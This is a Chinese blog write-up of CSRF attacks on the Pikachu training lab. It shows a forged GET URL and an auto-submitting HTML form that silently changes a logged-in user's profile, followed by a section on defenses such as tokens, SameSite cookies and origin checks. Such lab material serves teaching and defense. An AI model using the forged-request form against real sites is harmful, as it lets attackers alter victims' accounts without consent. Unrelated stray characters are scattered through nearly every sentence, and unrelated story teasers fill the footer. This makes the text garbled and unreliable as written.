2021-10-17-CSRF攻擊與防御(pikachu)

CSRF

Cross-site request forgery簡(jiǎn)稱為“CSRF”阳似,跨站請(qǐng)求偽造。 在CSRF的攻擊場(chǎng)景中攻擊者會(huì)偽造一個(gè)請(qǐng)求 (這個(gè)請(qǐng)求一般是一個(gè)鏈接) 然后欺騙目標(biāo)用戶進(jìn)行攻擊终抽,用戶一旦點(diǎn)擊了這個(gè)請(qǐng)求告匠,整個(gè)攻擊也就完成了。

img

用戶是網(wǎng)站A的注冊(cè)用戶年柠,且登錄進(jìn)去,于是網(wǎng)站A就給用戶下發(fā)cookie褪迟。

從上圖可以看出彪杉,要完成一次CSRF攻擊,受害者必須滿足兩個(gè)必要的條件:

(1)登錄受信任網(wǎng)站A牵咙,并在本地生成Cookie派近。(如果用戶沒(méi)有登錄網(wǎng)站A,那么網(wǎng)站B在誘導(dǎo)的時(shí)候洁桌,請(qǐng)求網(wǎng)站A的api接口時(shí)渴丸,會(huì)提示你登錄)

(2)在不登出A的情況下,訪問(wèn)危險(xiǎn)網(wǎng)站B(其實(shí)是利用了網(wǎng)站A的漏洞)另凌。

溫馨提示一下谱轨,cookie保證了用戶可以處于登錄狀態(tài),但網(wǎng)站B其實(shí)拿不到 cookie吠谢。

CSRF與XSS的區(qū)別:

CSRF攻擊者并沒(méi)有拿到用戶的權(quán)限土童,是借用戶的權(quán)限完成攻擊;(騙)

XSS可以通過(guò)盜取cookie來(lái)獲取用戶權(quán)限來(lái)完成破壞工坊。(偷)

(CSRF:需要用戶先登錄網(wǎng)站A献汗,獲取 cookie。XSS:不需要登錄王污。)

CSRF是利用網(wǎng)站A本身的漏洞罢吃,去請(qǐng)求網(wǎng)站A的api。

XSS是向網(wǎng)站 A 注入 JS代碼昭齐,然后執(zhí)行 JS 里的代碼尿招,篡改網(wǎng)站A的內(nèi)容。

CSRF(GET)

一個(gè)登錄框登錄后顯示用戶的個(gè)人信息(lucy阱驾,123456)


a.png

點(diǎn)擊修改個(gè)人信息就谜,提交時(shí)抓包看一下流量,修改后的參數(shù)直接在URL請(qǐng)求中

b.png

所以如果被攻擊者此時(shí)登錄狀態(tài)或cookie/session沒(méi)有過(guò)期里覆,訪問(wèn)攻擊者構(gòu)造的url就可以任意修改信息丧荐。

localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=123&phonenum=123&add=123&email=123&submit=submit

可以看到,電話號(hào)碼和住址都被修改


c.png

CSRF(POST)

也是先登錄租谈,這是必要的篮奄,然后抓取提交修改的流量捆愁,是POST方式。

d.png

可以自己建一個(gè)表單窟却,讓被攻擊者點(diǎn)惡意站點(diǎn)表單的URL昼丑。通過(guò)表單的URL去向存在CSRF漏洞的頁(yè)面去提交POST請(qǐng)求。

<!DOCTYPE html>
<html>
<head lang="en">
 <title>csrf_post</title>
 <script>
 window.onload = function() {
 document.getElementById("postsubmit").click();
 }
 </script>
</head>
<body>
 <form action="http://localhost/pikachu-master/vul/csrf/csrfpost/csrf_post_edit.php"  method="POST">
 <input type="text" name="sex" value="456"><br>
 <input type="hidden" name="phonenum" value="456"><br>
 <input type="hidden" name="add" value="456"><br>
 <input type="hidden" name="email" value="456"><br>
 <input id="postsubmit" type="submit" name="submit" value="submit" />
 </form>
</body>

</html>

修改成功


e.png

CSRF(token)

同樣的過(guò)程夸赫,get方式修改信息菩帝,但是還帶了一個(gè)token參數(shù)。

f.png

由于這個(gè)token是隨機(jī)不可預(yù)測(cè)的并且是隱藏看不見(jiàn)的茬腿,并且每次刷新呼奢,后臺(tái)發(fā)送過(guò)來(lái)的token都不一樣,起到了防止偽造的作用切平。具體過(guò)程是:

  1. 用戶訪問(wèn)某個(gè)表單頁(yè)面握础。

  2. 服務(wù)端生成一個(gè)Token,放在用戶的Session中悴品,或者瀏覽器的Cookie中禀综。【這里已經(jīng)不考慮XSS攻擊】

  3. 在頁(yè)面表單附帶上Token參數(shù)苔严。

  4. 用戶提交請(qǐng)求后定枷, 服務(wù)端驗(yàn)證表單中的Token是否與用戶Session(或Cookies)中的Token一致,一致為合法請(qǐng)求届氢,不是則非法請(qǐng)求欠窒。

CSRF的防御

CSRF的兩個(gè)特點(diǎn):

  • CSRF(通常)發(fā)生在第三方域名。
  • CSRF攻擊者不能獲取到Cookie等信息退子,只是使用岖妄。

針對(duì)這兩點(diǎn),我們可以專門制定防護(hù)策略絮供,如下:

  • 阻止不明外域的訪問(wèn)

    • 同源檢測(cè):Origin Header和Referer Header

      Host:描述請(qǐng)求將被發(fā)送的目的地衣吠,包括茶敏,且僅僅包括域名和端口號(hào)壤靶。在任何類型請(qǐng)求中,request都會(huì)包含此header信息惊搏。

      Origin:用來(lái)說(shuō)明請(qǐng)求從哪里發(fā)起的贮乳,包括,且僅僅包括協(xié)議和域名恬惯。這個(gè)參數(shù)一般只存在于CORS跨域請(qǐng)求中向拆,可以看到response有對(duì)應(yīng)的header:Access-Control-Allow-Origin。

      Referer:告知服務(wù)器請(qǐng)求的原始資源的URI酪耳,其用于所有類型的請(qǐng)求浓恳,并且包括:協(xié)議+域名+查詢參數(shù)(注意刹缝,不包含錨點(diǎn)信息)。因?yàn)樵嫉腢RI中的查詢參數(shù)可能包含ID或密碼等敏感信息颈将,如果寫(xiě)入referer梢夯,則可能導(dǎo)致信息泄露。

    • Samesite Cookie

      Set-Cookie響應(yīng)頭新增Samesite屬性晴圾,它用來(lái)標(biāo)明這個(gè) Cookie是個(gè)“同站 Cookie”颂砸,同站Cookie只能作為第一方Cookie,不能作為第三方Cookie死姚,Samesite 有兩個(gè)屬性值人乓,分別是 Strict 和 Lax。

      • Strict:表明這個(gè) Cookie 在任何情況下都不可能作為第三方 Cookie都毒,絕無(wú)例外色罚。

      • Lax:比 Strict 放寬了點(diǎn)限制,假如這個(gè)請(qǐng)求是這種請(qǐng)求(改變了當(dāng)前頁(yè)面或者打開(kāi)了新頁(yè)面)且同時(shí)是個(gè)GET請(qǐng)求账劲,則這個(gè)Cookie可以作為第三方Cookie保屯。

  • 提交時(shí)要求附加本域才能獲取的信息

    • CSRF Token

      1)服務(wù)器驗(yàn)證身份后,將CSRF Token返回給前端

      2)用戶頁(yè)面提交的請(qǐng)求攜帶這個(gè)Token

      3)服務(wù)器驗(yàn)證Token是否正確

      但是此方法的實(shí)現(xiàn)比較復(fù)雜涤垫,需要給每一個(gè)頁(yè)面都寫(xiě)入Token(前端無(wú)法使用純靜態(tài)頁(yè)面)姑尺,每一個(gè)Form及Ajax請(qǐng)求都攜帶這個(gè)Token,后端對(duì)每一個(gè)接口都進(jìn)行校驗(yàn)蝠猬,并保證頁(yè)面Token及請(qǐng)求Token一致切蟋。這就使得這個(gè)防護(hù)策略不能在通用的攔截上統(tǒng)一攔截處理,而需要每一個(gè)頁(yè)面和接口都添加對(duì)應(yīng)的輸出和校驗(yàn)榆芦。這種方法工作量巨大柄粹,且有可能遺漏。

    • 雙重Cookie驗(yàn)證

      利用CSRF攻擊不能獲取到用戶Cookie的特點(diǎn)匆绣,我們可以要求Ajax和表單請(qǐng)求攜帶一個(gè)Cookie中的值驻右。也就是說(shuō)在請(qǐng)求接口時(shí),除了常規(guī)帶上 cookie 中的用戶憑證信息崎淳,如 session_id 外堪夭,還把 cookie 中的用戶憑證信息讀出來(lái)附在接口請(qǐng)求參數(shù)里。

      1)在用戶訪問(wèn)網(wǎng)站頁(yè)面時(shí)拣凹,向請(qǐng)求域名注入一個(gè)Cookie森爽,內(nèi)容為隨機(jī)字符串(例如csrfcookie=v8g9e4ksfhw)。

      2)在前端向后端發(fā)起請(qǐng)求時(shí)嚣镜,取出Cookie爬迟,并添加到URL的參數(shù)中(接上例POST https://www.a.com/comment?csrfcookie=v8g9e4ksfhw)。

      3)后端接口驗(yàn)證Cookie中的字段與URL參數(shù)中的字段是否一致菊匿,不一致則拒絕付呕。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末计福,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子徽职,更是在濱河造成了極大的恐慌棒搜,老刑警劉巖,帶你破解...
    沈念sama閱讀 216,372評(píng)論 6 498
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件活箕,死亡現(xiàn)場(chǎng)離奇詭異力麸,居然都是意外死亡,警方通過(guò)查閱死者的電腦和手機(jī)育韩,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,368評(píng)論 3 392
  • 文/潘曉璐 我一進(jìn)店門克蚂,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái),“玉大人筋讨,你說(shuō)我怎么就攤上這事埃叭。” “怎么了悉罕?”我有些...
    開(kāi)封第一講書(shū)人閱讀 162,415評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵赤屋,是天一觀的道長(zhǎng)。 經(jīng)常有香客問(wèn)我壁袄,道長(zhǎng)类早,這世上最難降的妖魔是什么? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 58,157評(píng)論 1 292
  • 正文 為了忘掉前任嗜逻,我火速辦了婚禮涩僻,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘栈顷。我一直安慰自己逆日,他們只是感情好,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,171評(píng)論 6 388
  • 文/花漫 我一把揭開(kāi)白布萄凤。 她就那樣靜靜地躺著室抽,像睡著了一般。 火紅的嫁衣襯著肌膚如雪靡努。 梳的紋絲不亂的頭發(fā)上坪圾,一...
    開(kāi)封第一講書(shū)人閱讀 51,125評(píng)論 1 297
  • 那天,我揣著相機(jī)與錄音颤难,去河邊找鬼神年。 笑死,一個(gè)胖子當(dāng)著我的面吹牛行嗤,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播垛耳,決...
    沈念sama閱讀 40,028評(píng)論 3 417
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼栅屏,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼飘千!你這毒婦竟也來(lái)了?” 一聲冷哼從身側(cè)響起栈雳,我...
    開(kāi)封第一講書(shū)人閱讀 38,887評(píng)論 0 274
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤护奈,失蹤者是張志新(化名)和其女友劉穎,沒(méi)想到半個(gè)月后哥纫,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體霉旗,經(jīng)...
    沈念sama閱讀 45,310評(píng)論 1 310
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,533評(píng)論 2 332
  • 正文 我和宋清朗相戀三年蛀骇,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了厌秒。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片。...
    茶點(diǎn)故事閱讀 39,690評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡擅憔,死狀恐怖鸵闪,靈堂內(nèi)的尸體忽然破棺而出,到底是詐尸還是另有隱情暑诸,我是刑警寧澤蚌讼,帶...
    沈念sama閱讀 35,411評(píng)論 5 343
  • 正文 年R本政府宣布,位于F島的核電站个榕,受9級(jí)特大地震影響篡石,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜西采,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,004評(píng)論 3 325
  • 文/蒙蒙 一夏志、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧苛让,春花似錦沟蔑、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 31,659評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至仿畸,卻和暖如春食棕,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背错沽。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 32,812評(píng)論 1 268
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留千埃,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 47,693評(píng)論 2 368
  • 正文 我出身青樓谒臼,卻偏偏與公主長(zhǎng)得像朝刊,于是被迫代替她去往敵國(guó)和親。 傳聞我的和親對(duì)象是個(gè)殘疾皇子蜈缤,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,577評(píng)論 2 353

推薦閱讀更多精彩內(nèi)容